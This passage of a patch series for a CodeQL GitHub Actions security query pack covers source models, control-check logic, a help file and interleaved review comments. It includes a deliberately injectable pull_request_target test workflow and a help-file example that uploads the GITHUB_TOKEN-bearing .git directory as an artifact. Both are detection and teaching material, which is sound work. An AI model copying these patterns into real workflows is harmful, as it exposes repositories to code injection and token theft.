["jsmith/changes-since-last-tag", "*", "output.removed", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.renamed", "filename", "manual"] + diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml new file mode 100644 index 000000000000..0d4df5ef6b1d --- /dev/null +++ b/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml @@ -0,0 +1,8 @@ + +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/karpikpl/list-changed-files-action + - ["karpikpl/list-changed-files-action", "*", "output.changed_files", "filename", "manual"] diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/ql/lib/ext/manual/knu_changed-files.model.yml new file mode 100644 index 000000000000..5e7374dabad4 --- /dev/null 
+++ b/ql/lib/ext/manual/knu_changed-files.model.yml @@ -0,0 +1,11 @@ + +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/knu/changed-files + - ["knu/changed-files", "*", "output.changed_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.changed_files_json", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files_json", "filename", "manual"] diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml new file mode 100644 index 000000000000..9d0ecf04c6b8 --- /dev/null +++ b/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/martinhaintz/ga-file-list + - ["martinhaintz/ga-file-list", "*", "output.files", "filename", "manual"] + - ["martinhaintz/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml new file mode 100644 index 000000000000..281602cf0c73 --- /dev/null +++ b/ql/lib/ext/manual/rishabh510_path-lister-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/Rishabh510/Path-lister-action + - ["Rishabh510/Path-lister-action", "*", "output.paths", "filename", "manual"] + + diff --git a/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml new file mode 100644 index 000000000000..7daafbc2fd81 --- /dev/null +++ b/ql/lib/ext/manual/the-coding-turtle_ga-file-list.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/the-coding-turtle/ga-file-list + - ["the-coding-turtle/ga-file-list", "*", "output.files", "filename", "manual"] + - ["the-coding-turtle/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/ql/lib/ext/manual/w3f_action-find-old-files.model.yml b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml new file mode 100644 index 000000000000..38d892966d4a --- /dev/null +++ b/ql/lib/ext/manual/w3f_action-find-old-files.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/w3f/action-find-old-files + - ["w3f/action-find-old-files", "*", "output.files", "filename", "manual"] + diff --git a/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml new file mode 100644 index 000000000000..c65f7b1055fb --- /dev/null +++ b/ql/lib/ext/manual/yumemi-inc_changed-files.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + # https://github.com/yumemi-inc/changed-files + - ["yumemi-inc/changed-files", "*", "output.files", "filename", "manual"] + + From 15bb4d851d8210ce97b1d44bec6d7a8edd71b4aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 10:25:31 +0200 Subject: [PATCH 504/707] Add new test for flow through matrix --- .../CWE-094/.github/workflows/matrix_flow.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml new file mode 100644 index 000000000000..1093ddd3c4c1 --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml @@ -0,0 +1,29 @@ +name: Matrix Flow + +on: + pull_request_target: + +jobs: + lookup: + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.filelist.outputs.file_names }} + steps: + - uses: actions/checkout@v2 + - name: Get all zip files + id: filelist + uses: the-coding-turtle/ga-file-list@v0.1 + with: + directory: "." + file_extension: "zip" + + multi_tenant: + needs: lookup + runs-on: ubuntu-latest + strategy: + matrix: + tenant: ${{fromJson(needs.lookup.outputs.matrix)}} + steps: + - name: Show all files + run: | + echo "this is file: ${{ matrix.TENANT }}" From 5fe81ddb08b18a29bce260d9a052c623e2049931 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 18:07:25 +0200 Subject: [PATCH 505/707] Update tests --- ql/test/library-tests/test.expected | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 6bedcadcdbab..9205675ac0fe 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
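Review bot: The `run` step interpolates `${{ matrix.TENANT }}` while the matrix key is declared as `tenant`; if the fixture deliberately relies on case-insensitive context property lookup, a comment saying so would stop a reader from treating it as a typo, otherwise `matrix.tenant` is the key that is actually defined. A one-line comment on the `multi_tenant` job stating that the injected value is the file list produced by `the-coding-turtle/ga-file-list` and carried through `needs.lookup.outputs.matrix` would make the flow the test is meant to exercise explicit.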
@@ -1327,10 +1327,18 @@ scopes | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | +| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | +| Rishabh510/Path-lister-action | * | output.paths | filename | manual | +| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | +| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | +| ab185508/file-type-finder | * | output.names | filename | manual | +| ab185508/file-type-finder | * | output.paths | filename | manual | | ahmadnassri/action-changed-files | * | output.files | filename | manual | | ahmadnassri/action-changed-files | * | output.json | json | manual | | alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | | amannn/action-semantic-pull-request | * | output.error_message | text | manual | +| ankitjain28may/list-files-in-pr | * | output.pullRequestFiles | filename | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | | eficode/resolve-pr-refs | * | output.head_ref | branch | manual | 
@@ -1345,16 +1353,30 @@ sources | jitterbit/get-changed-files | * | output.modified | filename | manual | | jitterbit/get-changed-files | * | output.removed | filename | manual | | jitterbit/get-changed-files | * | output.renamed | filename | manual | +| jsmith/changes-since-last-tag | * | output.added | filename | manual | +| jsmith/changes-since-last-tag | * | output.files | filename | manual | +| jsmith/changes-since-last-tag | * | output.modified | filename | manual | +| jsmith/changes-since-last-tag | * | output.removed | filename | manual | +| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | +| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | +| knu/changed-files | * | output.changed_files | filename | manual | +| knu/changed-files | * | output.changed_files_json | filename | manual | +| knu/changed-files | * | output.matched_files | filename | manual | +| knu/changed-files | * | output.matched_files_json | filename | manual | | lots0logs/gh-action-get-changed-files | * | output.added | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | | lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | | marocchino/on_artifact | * | output.* | artifact | manual | +| martinhaintz/ga-file-list | * | output.file_names | filename | manual | +| martinhaintz/ga-file-list | * | output.files | filename | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | | potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | +| 
the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | +| the-coding-turtle/ga-file-list | * | output.files | filename | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | | trilom/file-changes-action | * | output.files | filename | manual | @@ -1362,7 +1384,9 @@ sources | trilom/file-changes-action | * | output.files_modified | filename | manual | | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| w3f/action-find-old-files | * | output.files | filename | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | +| yumemi-inc/changed-files | * | output.files | filename | manual | summaries | ActionsTools/read-json-action | * | artifact | output.* | taint | manual | | BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | From 48a0fd500d630e840e2797dd4cea2420e8658365 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 11 Sep 2024 18:09:05 +0200 Subject: [PATCH 506/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 45d91dcb7cc3..cf4acd613e31 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.42 +version: 0.1.43 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a41aba954384..a5cff2605369 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.42 +version: 0.1.43 groups: [actions, queries] suites: codeql-suites extractor: javascript From 69818c5bb5a22c0d6327d572be0eb8f1b266fd98 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 12 Sep 2024 09:58:21 +0200 Subject: [PATCH 507/707] Remove bindingset from DataFlow's compatibleTypes --- ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index 2d3918414106..0d214c63c5d1 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -166,8 +166,7 @@ class DataFlowType extends TDataFlowType {
 string ppReprType(DataFlowType t) { none() }
-bindingset[t1, t2]
-predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 }
+predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { any() }
 predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() }
From 3a390582991cee93903a38be9f064237ae8f6af3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 12 Sep 2024 10:42:12 +0200 Subject: [PATCH 508/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index cf4acd613e31..0e019d05e86b 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.43
+version: 0.1.44
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index a5cff2605369..83c273431e17 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.43
+version: 0.1.44
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 69b9542a5f4c6ab446e71c1423f9a6caf8ba1b3c Mon Sep 17 00:00:00 2001
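Review bot: `compatibleTypes` now holds for every pair of types, so type compatibility no longer prunes anything in the shared data-flow library, and nothing in the hunk says whether that is because there is only one `DataFlowType` or because types are intentionally ignored; a QLDoc line would stop a later reader from restoring the `t1 = t2` form, e.g. `/** Holds for every pair: this library does not use types to restrict flow. */`. That there is a single type is only an inference from the `none()` bodies of `ppReprType` and `typeStrongerThan`, so word the comment according to the actual `TDataFlowType` definition, which is outside the hunk.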
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 17 Sep 2024 17:06:50 +0200 Subject: [PATCH 509/707] Add help file for SecretsInArtifacts query --- ql/src/Security/CWE-312/SecretsInArtifacts.md | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 ql/src/Security/CWE-312/SecretsInArtifacts.md diff --git a/ql/src/Security/CWE-312/SecretsInArtifacts.md b/ql/src/Security/CWE-312/SecretsInArtifacts.md new file mode 100644 index 000000000000..5b05c9a118fa --- /dev/null +++ b/ql/src/Security/CWE-312/SecretsInArtifacts.md @@ -0,0 +1,47 @@ +# Storage of sensitive information in GitHub Actions artifact + +## Description + +Sensitive information included in a GitHub Actions artifact can allow an attacker to access the sensitive information if the artifact is published. + +## Recommendation + +Only store information that is meant to be publicly available in a GitHub Actions artifact. + +## Example + +The following example uses `actions/checkout` to checkout code which stores the GITHUB_TOKEN in the \`.git/config\` file and then stores the contents of the \`.git\` repository into the artifact: + +```yaml +name: secrets-in-artifacts +on: + pull_request: +jobs: + a-job: # VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 + with: + name: file + path: . +``` + +The issue has been fixed below, where the `actions/upload-artifact` uses a version (v4+) which does not include hidden files or directories into the artifact. + +```yaml +name: secrets-in-artifacts +on: + pull_request: +jobs: + a-job: # NOT VULNERABLE + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: "Upload artifact" + uses: actions/upload-artifact@v4 + with: + name: file + path: . +``` From 92f3b1614c16889ab32a6bc0fcfb7be2fced9c40 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 17 Sep 2024 17:07:35 +0200 Subject: [PATCH 510/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0e019d05e86b..285f9cfe5235 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.44 +version: 0.1.45 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 83c273431e17..3c02acfff199 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.44 +version: 0.1.45 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4f075f3f36679d9b289585bd967889c7def84104 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 19 Sep 2024 13:38:08 +0200 Subject: [PATCH 511/707] feat: Improve sanitizer checks --- ql/lib/codeql/actions/Helper.qll | 3 +- .../codeql/actions/security/ControlChecks.qll | 148 +++++++++++------- .../config/externally_triggereable_events.yml | 5 +- .../Security/CWE-074/OutputClobberingHigh.ql | 14 +- .../CWE-077/EnvPathInjectionCritical.ql | 14 +- .../CWE-077/EnvVarInjectionCritical.ql | 19 ++- .../CWE-088/ArgumentInjectionCritical.ql | 8 +- .../Security/CWE-094/CodeInjectionCritical.ql | 6 + .../CWE-349/CachePoisoningViaCodeInjection.ql | 4 +- .../CWE-349/CachePoisoningViaDirectCache.ql | 4 +- .../CachePoisoningViaPoisonableStep.ql | 4 +- .../UntrustedCheckoutTOCTOUCritical.ql | 7 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 7 +- .../CWE-829/UntrustedCheckoutCritical.ql | 31 +++- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 23 ++- .../CWE-829/.github/workflows/test11.yml | 94 +++++++++++ .../CWE-829/.github/workflows/test12.yml | 96 ++++++++++++ .../CWE-829/.github/workflows/test13.yml | 31 ++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 11 +- .../CWE-829/UntrustedCheckoutHigh.expected | 1 + 21 files changed, 450 insertions(+), 81 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test13.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 1d88f6f65118..9ac67575b8b3 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -248,8 +248,7 @@ predicate inPrivilegedCompositeAction(AstNode node) {
 predicate inPrivilegedExternallyTriggerableJob(AstNode node) {
 exists(Job j |
 j = node.getEnclosingJob() and
- j.isPrivilegedExternallyTriggerable() and
- not exists(ControlCheck check, Event e | j.getATriggerEvent() = e | check.protects(node, e))
+ j.isPrivilegedExternallyTriggerable()
 )
 }
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll
index 2d8e60dca376..650ae8d8105a 100644
--- a/ql/lib/codeql/actions/security/ControlChecks.qll
+++ b/ql/lib/codeql/actions/security/ControlChecks.qll
@@ -1,17 +1,46 @@
 import actions
+string any_relevant_category() {
+ result =
+ [
+ "untrusted-checkout", "output-clobbering", "envpath-injection", "envvar-injection",
+ "command-injection", "argument-injection", "code-injection", "cache-poisoning",
+ "untrusted-checkout-toctou", "artifact-poisoning"
+ ]
+}
+
+string any_non_toctou_category() {
+ result = any_relevant_category() and not result = "untrusted-checkout-toctou"
+}
+
+string any_relevant_event() {
+ result =
+ [
+ "pull_request_target",
+ "issue_comment",
+ "pull_request_comment",
+ "workflow_run",
+ "issues",
+ "fork",
+ "watch",
+ "discussion_comment",
+ "discussion"
+ ]
+}
+
 /** An If node that contains an actor, user or label check */
 abstract class ControlCheck extends AstNode {
 ControlCheck() {
 this instanceof If or
 this instanceof Environment or
- this instanceof UsesStep
+ this instanceof UsesStep or
+ this instanceof Run
 }
- predicate protects(Step step, Event event) {
+ predicate protects(Step step, Event event, string category) {
 event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and
- this.getAProtectedEvent() = event.getName() and
- this.dominates(step)
+ this.dominates(step) and
+ this.protectsCategoryAndEvent(category, event.getName())
 }
 predicate dominates(Step step) {
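Review bot: Removing the `ControlCheck` exclusion from `inPrivilegedExternallyTriggerableJob` moves that filter into every query, so any query that calls `inPrivilegedContext` and is not in this commit silently loses it; the diffstat touches only the Critical/High variants of the injection queries and no CommandInjection query at all, although `command-injection` is one of the categories introduced in ControlChecks.qll, so those (if they exist) may now report steps that are guarded by a check. A QLDoc line would make the new contract explicit, e.g. `/** Holds if `node` is in a privileged, externally triggerable job. Callers must exclude checked steps themselves via `ControlCheck.protects`. */`. The body of `inPrivilegedExternallyTriggerableJob` is complete within the hunk; the file's other predicates are not visible here.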
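Review bot: The QLDoc `/** An If node that contains an actor, user or label check */` is now wrong on two counts: the characteristic predicate admits `Environment`, `UsesStep` and (new here) `Run` nodes, and the subclasses in the next hunk also model repository, permission, environment and date-comparison checks; suggest `/** An If, Environment, UsesStep or Run node that acts as a control check (actor, association, repository, permission, label, environment or date comparison) for the steps it dominates. */`. `protects` deserves a line per parameter, in particular that `category` is one of the `any_relevant_category()` strings and that `event` is matched by name and must belong to the same workflow as `step`. `any_relevant_event()` is added without a visible caller; if nothing outside this hunk uses it, either wire it into `protectsCategoryAndEvent` or drop it. `dominates` continues outside the hunk.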
@@ -30,80 +59,71 @@ abstract class ControlCheck extends AstNode {
 step.getEnclosingJob().getANeededJob().getEnvironment() = this
 )
 or
- this.(UsesStep).getAFollowingStep() = step
+ this.(Step).getAFollowingStep() = step
 }
- abstract string getAProtectedEvent();
-
- abstract boolean protectsAgainstRefMutationAttacks();
+ abstract predicate protectsCategoryAndEvent(string category, string event);
 }
 abstract class AssociationCheck extends ControlCheck {
- // checks who you are (identity)
- // association checks are effective against pull requests since they can control who is making the PR
- // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
- // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval
- override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] }
-
- override boolean protectsAgainstRefMutationAttacks() { result = true }
+ // Checks if the actor is a COLLABORATOR of the repo
+ // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR
+ // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = ["pull_request_target", "workflow_run"] and category = any_relevant_category()
+ }
 }
 abstract class ActorCheck extends ControlCheck {
- // checks who you are (identity)
- // actor checks are effective against pull requests since they can control who is making the PR
- // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
- // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval
- override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] }
-
- override boolean protectsAgainstRefMutationAttacks() { result = true }
+ // checks for a specific actor
+ // - they are effective against pull requests and workflow_run (since these are triggered by pull_requests) since they can control who is making the PR
+ // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = ["pull_request_target", "workflow_run"] and category = any_relevant_category()
+ }
 }
 abstract class RepositoryCheck extends ControlCheck {
- // repository checks are effective against pull requests since they can control where the code is coming from
- // they are not effective against issue_comment since the repository will always be the same
- // who you are (identity)
- override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] }
-
- override boolean protectsAgainstRefMutationAttacks() { result = true }
+ // checks that the origin of the code is the same as the repository.
+ // for pull_requests, that means that it triggers only on local branches or repos from the same org
+ // - they are effective against pull requests/workflow_run since they can control where the code is coming from
+ // - they are not effective against issue_comment since the repository will always be the same
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = ["pull_request_target", "workflow_run"] and category = any_relevant_category()
+ }
 }
 abstract class PermissionCheck extends ControlCheck {
- // permission checks are effective against pull requests since they can control who can make changes
- // they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
- // someone entitled to trigger the workflow with a comment, may no detect a malicious comment, or the comment may mutate after approval
- // who you are (identity)
- override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] }
-
- override boolean protectsAgainstRefMutationAttacks() { result = true }
+ // checks that the actor has a specific permission level
+ // - they are effective against pull requests/workflow_run since they can control who can make changes
+ // - they are not effective against issue_comment since the author of the comment may not be the same as the author of the PR
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = ["pull_request_target", "workflow_run", "issue_comment"] and
+ category = any_relevant_category()
+ }
 }
 abstract class LabelCheck extends ControlCheck {
- // does it protect injection attacks but not pwn requests?
- // pwn requests are susceptible to checkout of mutable code
- // but injection attacks are not, although a branch name can be changed after approval and perhaps also some other things
- // they do actually protext against untrusted code execution (sha)
- // what you have (approval)
- // TODO: A check should be a combination of:
- // - event type (pull_request, issue_comment, etc)
- // - category (untrusted mutable code, untrusted immutable code, code injection, etc)
- // - we dont know this unless we pass category to inPrivilegedContext and into ControlCheck.protects
- // - we can decide if a control check is effective based only on the ast node
- override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] }
-
- // ref can be mutated after approval
- override boolean protectsAgainstRefMutationAttacks() { result = false }
+ // checks if the issue/pull_request is labeled, which implies that it could have been approved
+ // - they dont protect against mutation attacks
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category()
+ }
 }
 class EnvironmentCheck extends ControlCheck instanceof Environment {
 // Environment checks are not effective against any mutable attacks
- // they do actually protext against untrusted code execution (sha)
- // what you have (approval)
- EnvironmentCheck() { any() }
-
- override string getAProtectedEvent() { result = ["pull_request", "pull_request_target"] }
+ // they do actually protect against untrusted code execution (sha)
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ event = ["pull_request_target", "workflow_run"] and category = any_non_toctou_category()
+ }
+}
- // ref can be mutated after approval
- override boolean protectsAgainstRefMutationAttacks() { result = false }
+abstract class CommentVsHeadDateCheck extends ControlCheck {
+ override predicate protectsCategoryAndEvent(string category, string event) {
+ // by itself, this check is not effective against any attacks
+ none()
+ }
 }
 /* Specific implementations of control checks */
@@ -184,6 +204,12 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep {
 class PermissionActionCheck extends PermissionCheck instanceof UsesStep {
 PermissionActionCheck() {
+ this.getCallee() = "sushichop/action-repository-permission" and
+ this.getArgument("required-permission") = ["write", "admin"]
+ or
+ this.getCallee() = "prince-chrismc/check-actor-permissions-action" and
+ this.getArgument("permission") = ["write", "admin"]
+ or
 this.getCallee() = "lannonbr/repo-permission-check-action" and
 this.getArgument("permission") = ["write", "admin"]
 or
@@ -195,3 +221,13 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep {
 )
 }
 }
+
+class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run {
+ BashCommentVsHeadDateCheck() {
+ exists(string line |
+ line = this.getScript().splitAt("\n") and
+ line.toLowerCase()
+ .regexpMatch(".*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*")
+ )
+ }
+}
diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml
index 88d17c728b75..028671c243dd 100644
--- a/ql/lib/ext/config/externally_triggereable_events.yml
+++ b/ql/lib/ext/config/externally_triggereable_events.yml
@@ -6,13 +6,14 @@ extensions: - ["discussion"] - ["discussion_comment"] - ["fork"] + - ["watch"] - ["issue_comment"] - ["issues"] - - ["pull_request"] + - ["pull_request"] # non-privileged - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] - ["pull_request_target"] - - ["workflow_run"] # depending on trigger workflow - ["workflow_run"] # depending on branch filter - ["workflow_call"] # depending on caller
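Review bot: In `PermissionCheck` the comment says the check is `not effective against issue_comment since the author of the comment may not be the same as the author of the PR`, yet the predicate directly below lists `"issue_comment"` among the protected events; one of the two is wrong, and since a permission check on the commenter says nothing about who authored the PR head that a later step may check out, the comment seems to be the accurate one, so either drop `"issue_comment"` from the list or rewrite the comment to explain why commenter permission is enough for every category. `CommentVsHeadDateCheck.protectsCategoryAndEvent` is `none()`, so that class can never satisfy `protects`; a QLDoc line stating that it exists only to be recognised or combined elsewhere would explain why it is a `ControlCheck` at all. The hunk covers the rewritten hierarchy from `dominates` through `CommentVsHeadDateCheck`; `dominates` itself starts before it.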
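Review bot: `BashCommentVsHeadDateCheck` only recognises a script line that holds two `date -d` invocations on the same line, each referencing one of `commit_at|pushed_at|comment_at|commented_at`; because `splitAt("\n")` matches per line, a script that computes the two timestamps in separate assignments and compares them afterwards does not match, so the class is narrower than its name suggests. The lowercasing before `regexpMatch` also makes the alternation case-insensitive, which the class should state; suggest `// Recognises a Run step that compares the head commit/push date with the comment date via two `date -d` calls on one script line (case-insensitive); multi-line forms are not detected.`. A CWE-367 fixture with both shapes would pin the intended coverage, and none of the new test files in the diffstat is under that directory.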
diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql
index c53489f96285..0ead5aa76890 100644
--- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql
+++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql
@@ -16,6 +16,7 @@ import actions
 import codeql.actions.security.OutputClobberingQuery
 import codeql.actions.dataflow.ExternalFlow
 import OutputClobberingFlow::PathGraph
+import codeql.actions.security.ControlChecks
 from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink
 where
@@ -23,9 +24,20 @@ where
 inPrivilegedContext(sink.getNode().asExpr()) and
 // exclude paths to file read sinks from non-artifact sources
 (
- not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ not exists(ControlCheck check |
+ check
+ .protects(sink.getNode().asExpr(),
+ source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection")
+ )
 or
 source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
